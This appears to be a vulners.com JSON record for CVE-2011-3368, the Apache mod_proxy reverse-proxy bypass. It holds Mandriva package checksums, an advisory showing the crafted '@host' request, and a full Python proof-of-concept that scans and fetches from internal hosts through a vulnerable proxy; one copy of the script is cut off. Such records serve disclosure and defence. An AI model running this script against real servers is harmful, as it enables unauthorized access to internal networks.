2010.1/x86_64/apache-mod_ssl-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 52b797f3e31ed58daff164b3f9339440 2010.1/x86_64/apache-modules-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 568ce8efc2c5d87f5a65f2c2c3f552c8 2010.1/x86_64/apache-mod_userdir-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n bc0ad260619fa1513c749f44e6842bfa 2010.1/x86_64/apache-mpm-event-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 2eff14b46b530cd91d8025d0bf36970c 2010.1/x86_64/apache-mpm-itk-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 
c15a1dc4de6a830b3ef6151f4bab901c 2010.1/x86_64/apache-mpm-peruser-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n f016b8856f9426c49798f993197fcd64 2010.1/x86_64/apache-mpm-prefork-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 71bc0152b74ef1a03349b275abb7145d 2010.1/x86_64/apache-mpm-worker-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n c9d21030172baaedbe9bc8d438c8285b 2010.1/x86_64/apache-source-2.2.15-3.4mdv2010.2.x86_64.rpm \r\n 3f523608f5ede71397a35e53d7a82ad9 2010.1/SRPMS/apache-2.2.15-3.4mdv2010.2.src.rpm\r\n\r\n Mandriva Linux 2011:\r\n fdf647dc322f45ba25112fb18761a8ca 2011/i586/apache-base-2.2.21-0.2-mdv2011.0.i586.rpm\r\n b1cd17efb6f49779d3f1608f7ce12317 2011/i586/apache-devel-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 5003144977743f8092bc2657bb8a5744 2011/i586/apache-htcacheclean-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 20b63b8bad01f15558bed39ae77735ad 2011/i586/apache-mod_authn_dbd-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 30d70e38df5ab5395a8fb2ded1eeb24d 2011/i586/apache-mod_cache-2.2.21-0.2-mdv2011.0.i586.rpm\r\n efecc88f522b8ceda095c150bb79b8c1 2011/i586/apache-mod_dav-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 38c556b4325441228f38fb13db21334d 2011/i586/apache-mod_dbd-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 8838bc6f398879fc4a012e72fa0460f6 2011/i586/apache-mod_deflate-2.2.21-0.2-mdv2011.0.i586.rpm\r\n b17372865f84422d9159cc7bec915918 2011/i586/apache-mod_disk_cache-2.2.21-0.2-mdv2011.0.i586.rpm\r\n d5a6b009940820ce886c5562c1aaec51 2011/i586/apache-mod_file_cache-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 2622ca1fd2eb31d57bf7dd8739862f6f 2011/i586/apache-mod_ldap-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 2b5cfd82bfe043be558c5f64b793eae4 2011/i586/apache-mod_mem_cache-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 4a931dcee38c86bb12de9f0e2981c11a 2011/i586/apache-mod_proxy-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 2f8fb519cb0a2617c3bc87a211af441f 2011/i586/apache-mod_proxy_ajp-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 66c2411ece3b4e6d3e77526869fac866 2011/i586/apache-mod_proxy_scgi-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 75eef4373837415e36372776380819f7 
2011/i586/apache-mod_reqtimeout-2.2.21-0.2-mdv2011.0.i586.rpm\r\n fa70ff654b3efe6d28969aa7460a9977 2011/i586/apache-mod_ssl-2.2.21-0.2-mdv2011.0.i586.rpm\r\n dc3a2f9f654727148ec6623a7f68aa3d 2011/i586/apache-modules-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 4b7d982f9a0e16c75e3d62127651bd73 2011/i586/apache-mod_userdir-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 46dd5bf60e0cc8aaa098136ffbc4d1f8 2011/i586/apache-mpm-event-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 750b7f77b7ac0ed715427869af54fa33 2011/i586/apache-mpm-itk-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 1a67882e778e3f3bc89b0ef45f039ea6 2011/i586/apache-mpm-peruser-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 7e85783e129e133a4b4de06484f50597 2011/i586/apache-mpm-prefork-2.2.21-0.2-mdv2011.0.i586.rpm\r\n b3ed18bc46d66240096aa65f5c557ff9 2011/i586/apache-mpm-worker-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 1a80519a9a4a5b83d6c136506eeb5ae0 2011/i586/apache-source-2.2.21-0.2-mdv2011.0.i586.rpm \r\n 0208ab576bca6346db61084a4247c585 2011/SRPMS/apache-2.2.21-0.2.src.rpm\r\n\r\n Mandriva Linux 2011/X86_64:\r\n 87da9845764ce52f30350a2da3f1bb50 2011/x86_64/apache-base-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 382426ba9336ddd28b26a25e3306effa 2011/x86_64/apache-devel-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n d39b4ad5420a27e886ee33102753611e 2011/x86_64/apache-htcacheclean-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n b9f07f25fada0f52f8467dc390b6c910 2011/x86_64/apache-mod_authn_dbd-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 396f1addba810264b4d7d8eac405c05d 2011/x86_64/apache-mod_cache-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n ae6cd0e23ccd835177f060debb4c373a 2011/x86_64/apache-mod_dav-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 75131d0a822f92b946a28f4c29925018 2011/x86_64/apache-mod_dbd-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 88301617766cafe8e1d142ec30ff7a32 2011/x86_64/apache-mod_deflate-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 7f03884c099d174c94ab2ca5c74ddb5f 2011/x86_64/apache-mod_disk_cache-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n ee9d59bf2fde441bdeadd810f6f624ee 
2011/x86_64/apache-mod_file_cache-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 60e5e7c1df99feaf019f5203deae62cf 2011/x86_64/apache-mod_ldap-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n c138331a28ac50ba59cab8499a6c8b5d 2011/x86_64/apache-mod_mem_cache-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 1d8183c8b428f6a824a1f9b7a1335124 2011/x86_64/apache-mod_proxy-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 587a07a541fb759edf6cf4e7723a8f13 2011/x86_64/apache-mod_proxy_ajp-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 643d55f506ddc7e2d8d9eeb370a7d5d0 2011/x86_64/apache-mod_proxy_scgi-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 317f850263dc7a177c7aeca49ff73c0f 2011/x86_64/apache-mod_reqtimeout-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n d13268e72655c84407bc4f84b7dfbc63 2011/x86_64/apache-mod_ssl-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n aba1a4f6b8a2e165d88dea70da96aa38 2011/x86_64/apache-modules-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n afa4e495f86f5c61994947211833eb87 2011/x86_64/apache-mod_userdir-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n c30be0170ee148a2b26bf90d56321b9c 2011/x86_64/apache-mpm-event-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n fe799582be71a26191caff516250d9bb 2011/x86_64/apache-mpm-itk-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 901ef8c7c3e97d00d08528bf9e4711b1 2011/x86_64/apache-mpm-peruser-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n d6309de31d78ced4ddfb4cd339bda2a1 2011/x86_64/apache-mpm-prefork-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 6e5481db63f7ee78b37bf4341f30f1e0 2011/x86_64/apache-mpm-worker-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 976de27a1426d6d4d0eeaf3a35b44564 2011/x86_64/apache-source-2.2.21-0.2-mdv2011.0.x86_64.rpm \r\n 0208ab576bca6346db61084a4247c585 2011/SRPMS/apache-2.2.21-0.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 362272e9ac2693eec7b635adc0d21703 mes5/i586/apache-base-2.2.9-12.13mdvmes5.2.i586.rpm\r\n d96a49a2c5e91ded681961ff6cc952a4 mes5/i586/apache-devel-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 49603b007ba8170dc03d2c126c84e50d mes5/i586/apache-htcacheclean-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 3380d84b972a6a463b045737ff613b49 
mes5/i586/apache-mod_authn_dbd-2.2.9-12.13mdvmes5.2.i586.rpm\r\n de7fa15db92d1d30e2da0445c1809813 mes5/i586/apache-mod_cache-2.2.9-12.13mdvmes5.2.i586.rpm\r\n a8010890a6a571f95020275b6f142bca mes5/i586/apache-mod_dav-2.2.9-12.13mdvmes5.2.i586.rpm\r\n b06ae064db3f74b0f784bf2901f72c2f mes5/i586/apache-mod_dbd-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 7dacb5f1cc7ba1cf990905290fdae463 mes5/i586/apache-mod_deflate-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 1c8585291e70c6a3d3809bad1f79e683 mes5/i586/apache-mod_disk_cache-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 3c1a95ac86df5dd6a3c1cb7b4daba63e mes5/i586/apache-mod_file_cache-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 0b6c33e07fe7f4c448dba48b5750f668 mes5/i586/apache-mod_ldap-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 0a5ac07dddf6dfb4f81260180f5400c7 mes5/i586/apache-mod_mem_cache-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 2e88a664547e82bf0a09e7a59df3cfb1 mes5/i586/apache-mod_proxy-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 02f77738b01c4fac6cbfd174aaf1f3dd mes5/i586/apache-mod_proxy_ajp-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 9ccb5fbad8be4a8b854202f61bbff404 mes5/i586/apache-mod_ssl-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 90b0eaa590c9ef3384d9d510b02acb0a mes5/i586/apache-modules-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 139ec8c7604ff186d9a5f7211cf153e2 mes5/i586/apache-mod_userdir-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 427d203744147b131faacaeda85d0c33 mes5/i586/apache-mpm-event-2.2.9-12.13mdvmes5.2.i586.rpm\r\n f05074badc58876520876f4c5030f65e mes5/i586/apache-mpm-itk-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 218eb230875cef887a298886add841c5 mes5/i586/apache-mpm-peruser-2.2.9-12.13mdvmes5.2.i586.rpm\r\n b18ac1117a837c0a01b0214d34914d33 mes5/i586/apache-mpm-prefork-2.2.9-12.13mdvmes5.2.i586.rpm\r\n a61b60d3ed2d40ca20154a7720d5d700 mes5/i586/apache-mpm-worker-2.2.9-12.13mdvmes5.2.i586.rpm\r\n ba799d2f8a25748d0222ca5c22b8d77b mes5/i586/apache-source-2.2.9-12.13mdvmes5.2.i586.rpm \r\n 805742aa36cff750b99f31e180fd867d mes5/SRPMS/apache-2.2.9-12.13mdvmes5.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 
fc201c9261c712da3f289e9b4027a5fc mes5/x86_64/apache-base-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 5525b60c6cfba84feed38edf06e2e246 mes5/x86_64/apache-devel-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 216f7afebeabd44b1fe3177b909bb169 mes5/x86_64/apache-htcacheclean-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 6e113f9a73cfef3c205e15b7ab5d9c09 mes5/x86_64/apache-mod_authn_dbd-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 6811ceefa8472b1af410f79262ec4fb6 mes5/x86_64/apache-mod_cache-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n ff747be8f132abad9629bda68dffba20 mes5/x86_64/apache-mod_dav-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n d36b00c90f690ca783ed1af88bfd07e2 mes5/x86_64/apache-mod_dbd-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 121ed1fef89fafed42538714a0c91742 mes5/x86_64/apache-mod_deflate-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 680c3c57565fa6937f1bd436461cf013 mes5/x86_64/apache-mod_disk_cache-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n b2c008438014163937dc4a4951d6f145 mes5/x86_64/apache-mod_file_cache-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 149fd8345aec9b63304643717c4e3aa0 mes5/x86_64/apache-mod_ldap-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n e549c5dd75bee4df39e9c947e0724b71 mes5/x86_64/apache-mod_mem_cache-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 784137d1caaaa974db42e54e0cbbc621 mes5/x86_64/apache-mod_proxy-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n c6dea61e1b6f8a2373741af10a9bf72a mes5/x86_64/apache-mod_proxy_ajp-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 92e34c8dbeac34258a527dead2c362e9 mes5/x86_64/apache-mod_ssl-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n c4780606189970462d0e7063fcc356ae mes5/x86_64/apache-modules-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 78bad1842ce68bf2a0c1fcf75a6805a2 mes5/x86_64/apache-mod_userdir-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 29db775ba6d750c955f70ea7d8e21bed mes5/x86_64/apache-mpm-event-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 34ba6c4d7e9f0a31cc010df6d97882c3 mes5/x86_64/apache-mpm-itk-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n b4b3ac445b8cb6bb3aaed1cad0756efc mes5/x86_64/apache-mpm-peruser-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 
fc138aec05894dc918ac1a2cd93731d2 mes5/x86_64/apache-mpm-prefork-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 5a1dcd551d4f49a39c76a1b1de709bd5 mes5/x86_64/apache-mpm-worker-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n c1908c1a28f94c61d3aced3485b64f73 mes5/x86_64/apache-source-2.2.9-12.13mdvmes5.2.x86_64.rpm \r\n 805742aa36cff750b99f31e180fd867d mes5/SRPMS/apache-2.2.9-12.13mdvmes5.2.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niD8DBQFOkBbQmqjQ0CJFipgRAnX4AKCegRXuoI4BSRlF/fpDsy5pYNVAgACeJKh2\r\nXA5J3HXCFMVungHV4GyLHwQ=\r\n=k57D\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-10-12T00:00:00", "published": "2011-10-12T00:00:00", "id": "SECURITYVULNS:DOC:27148", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27148", "title": "[ MDVSA-2011:144 ] apache", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "cvelist": ["CVE-2011-4317", "CVE-2011-3368"], "description": "Invalid processing for URI with preceding @ sign.", "edition": 1, "modified": 
"2012-01-11T00:00:00", "published": "2012-01-11T00:00:00", "id": "SECURITYVULNS:VULN:11968", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11968", "title": "Apache mod_proxy unauthorized internal network access", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "description": "Information leakage, filtering bypass, privilege escalation, DoS.", "edition": 1, "modified": "2012-02-03T00:00:00", "published": "2012-02-03T00:00:00", "id": "SECURITYVULNS:VULN:12166", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12166", "title": "Apache multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:44", "description": "", "published": "2011-10-06T00:00:00", "type": "packetstorm", "title": "Apache Reverse Proxy Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-06T00:00:00", "id": "PACKETSTORM:105591", "href": "https://packetstormsecurity.com/files/105591/Apache-Reverse-Proxy-Bypass.html", "sourceData": "`===============================ADVISORY============================== \nSystems Affected: Apache httpd \nSeverity: High \nCategory: Proxy Bypass \nAuthor: Context Information Security Ltd \nReported to vendor: 16th November 2011 \nAdvisory Issued: 5th October 2011 \nReference: CVE-2011-3368 \n===============================ADVISORY============================== \n \nDescription \n----------- \nContext discovered a security vulnerability which allows for Apache in reverse proxy mode to be used to access internal/DMZ systems due to a weakness in its handling of URLs being processed by mod_rewrite. 
\n \nAnalysis \n-------- \nIf the Apache configuration file is configured as follows (as previously recommended by Apache): \n \nRewriteRule ^(.*) http://internalserver$1 [P] \n \nAnd not with a trailing slash: \n \nRewriteRule ^(.*) http://internalserver/$1 [P] \n \nThen a request can be made to the proxy server to alter the URL using the user authentication URI syntax, such as: \n \nGET @InternalNotAccessibleServer/console HTTP/1.0 \n \nCausing the proxy to rewrite the URL to: \n \nhttp://internalserver@InternalNotAccessibleServer/console \n \nAnd provide access to the internal server which is not externally accessible. \n \nFor an in-depth analysis of this security issue read Context\u2019s blog at: \nhttp://www.contextis.com/research/blog/reverseproxybypass/ \n \nTechnologies Affected \n--------------------- \n \nApache httpd 1.3 all versions \nApache httpd 2.x all versions \n \n \n \nVendor Response \n--------------- \nApache have released a patch for this issue but recommend configuration files are reviewed. \nPatch available from: \nhttp://www.apache.org/dist/httpd/patches/apply_to_2.2.21/ \n \n \nDisclosure Timeline \n------------------- \n16th November 2011 \u2013 Vendor Notification \n5th October 2011 \u2013 Patch Released by Apache \n \n \nCredits \n-------- \nMichael Jordon and David Robinson of Context Information Security Ltd \n \n \nAbout Context Information Security \n---------------------------------- \n \nContext Information Security is an independent security consultancy specialising in both technical security and information assurance services. \n \nThe company was founded in 1998. Its client base has grown steadily over the years, thanks in large part to personal recommendations from existing clients who value us as business partners. 
We believe our success is based on the value our clients place on our product-agnostic, holistic approach; the way we work closely with them to develop a tailored service; and to the independence, integrity and technical skills of our consultants. \n \nThe company\u0092s client base now includes some of the most prestigious blue chip companies in the world, as well as government organisations. \n \nThe best security experts need to bring a broad portfolio of skills to the job, so Context has always sought to recruit staff with extensive business experience as well as technical expertise. Our aim is to provide effective and practical solutions, advice and support: when we report back to clients we always communicate our findings and recommendations in plain terms at a business level as well as in the form of an in-depth technical report. \n \nWeb: www.contextis.com \nEmail: disclosure@contextis.com \n \n \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/105591/context-apacheproxy.txt"}, {"lastseen": "2016-12-05T22:17:18", "description": "", "published": "2011-10-11T00:00:00", "type": "packetstorm", "title": "Apache mod_proxy Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-11T00:00:00", "id": "PACKETSTORM:105672", "href": "https://packetstormsecurity.com/files/105672/Apache-mod_proxy-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/env python \n \nimport socket \nimport string \nimport getopt, sys \n \n \nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080] \n \ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource): \n \nget = \"GET \" + url + \"@\" + internal_target + \":\" + internal_port + \"/\" + resource + \" HTTP/1.1\\r\\n\" \nget = get + \"Host: \" + apache_target + \"\\r\\n\\r\\n\" \n \nremoteserver = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nremoteserver.settimeout(3) \n \ntry: \nremoteserver.connect((apache_target, int(apache_port))) \nremoteserver.send(get) \nreturn remoteserver.recv(4096) \nexcept: \nreturn \"\" \n \ndef get_banner(result): \nreturn result[string.find(result, \"\\r\\n\\r\\n\")+4:] \n \n \ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource): \n \nprint_banner(url, apache_target, apache_port, internal_target, tested_ports, resource) \nfor port in tested_ports: \nport = str(port) \nresult = send_request(url, apache_target, apache_port, internal_target, port, resource) \nif string.find(result,\"HTTP/1.1 200\")!=-1 or \\ \nstring.find(result,\"HTTP/1.1 30\")!=-1 or \\ \nstring.find(result,\"HTTP/1.1 502\")!=-1: \nprint \"- Open port: \" + port + \"/TCP\" \nprint get_banner(result) \nelif len(result)==0: \nprint \"- Filtered port: \" + port + \"/TCP\" \nelse: \nprint \"- Closed port: \" + port + \"/TCP\" \n \n \ndef usage(): \nprint \nprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\" \nprint \"http://www.secforce.co.uk\" \nprint \nprint \"usage():\" \nprint \"python apache_scan.py [options]\" \nprint \nprint \" [options]\" \nprint \" -r: Remote Apache host\" \nprint \" -p: Remote Apache port (default is 80)\" \nprint \" -u: URL on the remote web server (default is /)\" \nprint \" -d: Host in the DMZ (default is 127.0.0.1)\" \nprint \" -e: Port in the DMZ (enables 'single port scan')\" \nprint \" -g: GET request to the host in the DMZ (default is /)\" \nprint \" -h: Help page\" \nprint \nprint \"examples:\" \nprint \" - Port scan of the remote host\" \nprint \" python apache_scan.py -r www.example.com -u /images/test.gif\" \nprint \" - Port scan of a host in the DMZ\" \nprint \" python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local\" \nprint \" - Retrieve a resource from a host in the DMZ\" \nprint \" python apache_scan.py -r www.example.com -u /images/test.gif -d 
internalhost.local -e 80 -g /accounts/index.html\" \nprint \n \ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource): \nprint \nprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\" \nprint \"http://www.secforce.co.uk\" \nprint \nprint \" [+] Target: \" + apache_target \nprint \" [+] Target port: \" + apache_port \nprint \" [+] Internal host: \" + internal_target \nprint \" [+] Tested ports: \" + str(tested_ports) \nprint \" [+] Internal resource: \" + resource \nprint \n \n \ndef main(): \n \nglobal apache_target \nglobal apache_port \nglobal url \nglobal internal_target \nglobal internal_port \nglobal resource \n \ntry: \nopts, args = getopt.getopt(sys.argv[1:], \"u:r:p:d:e:g:h\", [\"help\"]) \nexcept getopt.GetoptError: \nusage() \nsys.exit(2) \n \ntry: \nfor o, a in opts: \nif o in (\"-h\", \"--help\"): \nusage() \nsys.exit(2) \nif o == \"-u\": \nurl=a \nif o == \"-r\": \napache_target=a \nif o == \"-p\": \napache_port=a \nif o == \"-d\": \ninternal_target = a \nif o == \"-e\": \ninternal_port=a \nif o == \"-g\": \nresource=a \n \nexcept getopt.GetoptError: \nusage() \nsys.exit(2) \n \nif apache_target == \"\": \nusage() \nsys.exit(2) \n \n \nurl = \"/\" \napache_target = \"\" \napache_port = \"80\" \ninternal_target = \"127.0.0.1\" \ninternal_port = \"\" \nresource = \"/\" \n \nmain() \n \nif internal_port!=\"\": \ntested_ports = [internal_port] \nelse: \ntested_ports = known_ports \n \nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource) \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/105672/apache_proxy_scanner.py.txt"}], "seebug": [{"lastseen": "2017-11-19T17:59:00", "description": "Bugtraq ID: 49957\r\nCVE ID\uff1aCVE-2011-3368\r\n\r\nApache HTTP Server\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684HTTPD\u670d\u52a1\u7a0b\u5e8f\u3002\r\nApache HTTP Server 
mod_proxy\u6a21\u5757\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u6076\u610f\u7528\u6237\u7ed5\u8fc7\u90e8\u5206\u5b89\u5168\u9650\u5236\u3002\r\n\u5f53mod_proxy\u6a21\u5757\u914d\u7f6e\u4ee5\u53cd\u5411\u4ee3\u7406\u6a21\u5f0f\u65f6\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\uff0c\u7531\u4e8e\u4e0d\u6b63\u786e\u5904\u7406\u90e8\u5206WEB\u8bf7\u6c42\uff0c\u653b\u51fb\u8005\u6784\u5efa\u7279\u5236\u7684URL\u53ef\u5411\u4ee3\u7406\u540e\u7684\u4e0d\u53ef\u671f\u670d\u52a1\u5668\u53d1\u9001\u6076\u610f\u8bf7\u6c42\u3002\r\n\u8981\u6210\u529f\u5229\u7528\u6f0f\u6d1e\u9700\u8981\u4f7f\u7528\u5177\u6709\u4e00\u5b9a\u7684\u6a21\u5f0f\u5339\u914d\u7684"ProxyPassMatch"\u548c"RewriteRule"\u914d\u7f6e\u547d\u4ee4\u3002\n\nApache 2.0.x\r\nApache 2.2.x\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u4f9b\u5e94\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\uff1a\r\nhttp://www.apache.org/dist/httpd/patches/apply_to_2.2.21/CVE-2011-3368.patch", "published": "2011-10-08T00:00:00", "title": "Apache HTTP Server 'mod_proxy'\u53cd\u5411\u4ee3\u7406\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20979", "id": "SSV:20979", "sourceData": "\n \u5982\u5982\u4e0b\u7684\u914d\u7f6e\uff1a\r\nRewriteRule (.*)\\.(jpg|gif|png) http://images.example.com$1.$2 [P]\r\nProxyPassMatch (.*)\\.(jpg|gif|png) http://images.example.com$1.$2\r\n\u53ef\u5bfc\u81f4\u6cc4\u9732\u5185\u90e8\u670d\u52a1\u5668\u4fe1\u606f\uff0c\u5982\u4e0b\u5f62\u5f0f\u7684\u8bf7\u6c42\uff1a\r\n GET @other.example.com/something.png HTTP/1.1\r\n \r\n\u4f1a\u8f6c\u8bd1\u6210\u5982\u4e0b\u7684\u76ee\u6807\u8bf7\u6c42\r\nhttp://images.example.com () other example 
com/something.png\r\n\u8fd9\u4f1a\u5bfc\u81f4\u4ee3\u7406\u8fde\u63a5"other.example.com"\uff0c\u56e0\u4e3a\u5f53\u89e3\u6790URL\u65f6"images.example.com@"\u6bb5\u4f1a\u4f5c\u4e3a\u7528\u6237\u9a8c\u8bc1\u51ed\u636e\u4f7f\u7528\u3002\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20979"}, {"lastseen": "2017-11-19T17:58:49", "description": "No description provided by source.", "published": "2011-10-12T00:00:00", "title": "Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20993", "id": "SSV:20993", "sourceData": "\n #!/usr/bin/env python\r\n \r\nimport socket\r\nimport string\r\nimport getopt, sys\r\n \r\n \r\nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]\r\n \r\ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource):\r\n \r\n get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\\r\\n"\r\n get = get + "Host: " + apache_target + "\\r\\n\\r\\n"\r\n \r\n remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n remoteserver.settimeout(3)\r\n \r\n try:\r\n remoteserver.connect((apache_target, int(apache_port)))\r\n remoteserver.send(get)\r\n return remoteserver.recv(4096)\r\n except:\r\n return ""\r\n \r\ndef 